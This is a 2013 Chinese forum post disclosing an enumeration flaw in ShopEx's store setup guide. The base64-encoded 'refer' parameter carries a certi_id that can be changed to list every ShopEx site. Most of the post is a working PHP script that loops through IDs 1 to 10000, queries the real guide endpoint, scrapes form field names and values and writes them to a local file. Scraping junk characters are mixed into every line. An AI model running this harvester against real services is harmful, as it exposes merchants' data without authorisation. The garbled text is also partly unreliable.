|
|
简要描述:
1 i% m+ E S" m. XShopEx某接口缺陷,可遍历所有网站
* @; \" u0 h0 y2 |详细说明:
c, o$ e8 [. ^3 H! E# v) n问题出现在shopex 网店使用向导页面 6 A2 \. h2 S. u+ c0 _) P' y
/ u, N6 @: E- ~3 w) k
+ e# e/ j% Y8 g2 g
' I1 h# ^+ Z9 e. Mhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=5 K% z% `% Y4 f4 \7 p# R
8 J# O+ X9 `- ]# O w$ }2 `$ K/ a6 \, Y Z" ^$ a
' U% M8 c9 N& E& M v: Qrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}/ O j1 K$ D1 B8 {8 t3 W
, Y" w. M4 D0 L9 ?( Q: b. v* h6 j3 N
& \. v& Q5 Z" Z7 |: z4 V; X$ q8 o我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 & b: }* B8 S: i! {7 C# F# h
0 u- c6 r" x! y: @6 }( l! ^
7 j O4 Z( {5 V" }" D0 n& A
- d& V( T' G' R0 s: h5 h, E P<?php6 R7 p5 Z3 O0 E- A1 z
5 L) E6 B* H% b3 z" V( ] for ($i=1; $i < 10000; $i++) { //遍历. J" T ]# f% X3 D6 I& s
; h& P+ W, Y( l" }: T
ShowshopExD($i);: ` x/ n9 [* U9 u7 Q4 A+ g1 w9 R
, F% I# n3 d- [; F* _ }: D! x) s2 P9 J
6 [+ U* j2 g- y- j% D
function ShowshopExD($cid) {
5 A0 G5 r" @1 I9 @. l8 _
4 P. l) [4 y+ @4 J- v7 F. O1 M $url='http://guide.ecos.shopex.cn/step2.php';
4 j' t6 Z& a# C0 r9 `1 d5 P
: Y7 \& n9 @( A $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');( x8 i! s1 @! q7 {1 ^% d
% t; f r7 w! v/ l* I v
$url = $url.'?refer='.$refer;1 W% s+ |) |" r, @7 k9 W% c3 s
; l b4 M( K' s: c( c# T) e $ch = curl_init($url);5 A9 m( O! q- y2 s! j
1 [* M2 f$ n0 c3 s j6 R; h: g$ P
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
* A2 m% j! S) _9 V" s$ y1 J. x2 g2 g x& w
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
$ y/ A8 v! o8 j5 [. `: y+ {6 N$ u" ~+ O t
$result = curl_exec($ch);# a# _& p) ?. y
$ q' B3 e- o/ o$ W6 f $result = mb_convert_encoding($result, "gb2312", "UTF-8");+ s* h, a% O; @4 p g
% V$ I1 F6 j3 v! ]$ I
if(strpos($result,$refer))( N n* |9 n/ G. A" d' d
+ ?0 C i% Q4 i0 V/ k9 \3 z {
6 A' I; |- P! ^( d+ e, }# U" Z( C: g; w& E2 {
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件3 L( d$ x$ e9 O2 H
. K& t/ K4 A3 P
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
* Z7 E( w0 ~$ x- S# E. @0 V2 F* B, O- G6 |; D0 j3 M9 `5 e7 V# R
foreach ($value[1] as $key) {
2 O2 W9 F3 t/ q
( T/ B7 f- H$ T preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);6 ~: r/ f) \8 H% G7 v
1 k7 }/ i4 m. Z" X3 v0 o. H/ Z
echo $res[1][0].':'.$res[3][0]."\r\n";
; B( Y7 o% _% f) k
( Z9 d) t" E3 S- e $col =$res[1][0].':'.$res[3][0]."\r\n"; + c( w! s2 S; Q6 W
. c- y8 J9 H$ x# P2 B- V3 A! U& c
fwrite($fp, $col, strlen($col));
- p; t/ f+ H9 C J# ~" c- H3 n* F9 X; s2 J, j8 p& ^: W
}3 I+ t/ z7 Y. S" ]6 g
. y. s6 G; w9 Y& `+ C
echo '--------------------------------'."\r\n";
. b- j! Q5 u; B, F0 ^* L3 b% ]+ `6 S8 H) k" I8 s# `+ A' o" L& @
fclose($fp); # `8 Y) t( ]2 B$ y0 L# _8 J, D
7 u' D2 q/ v% p4 M, @ }2 w: g& t4 N: J# v) b; }6 Z
0 H7 I+ z& B6 K8 G' U
flush();/ O" r6 T( v5 s% l6 w8 @& m) R
# j9 V; d* Z# W% o# D6 }5 G
curl_close($ch);4 W6 t2 d4 T( ^( p0 o
' ]$ x; i; z; L, g& n5 L1 [
}1 E S; j( K$ V2 ]! d _
0 b8 h9 r2 C6 r* T. d; m3 Q?>+ y5 Z9 l" M1 l6 ]
漏洞证明:7 R1 @4 A5 v J! C
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg. V4 c7 P4 t+ ?- {; _
refer换成其他加密方式4 k2 `# E' h. g4 J
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对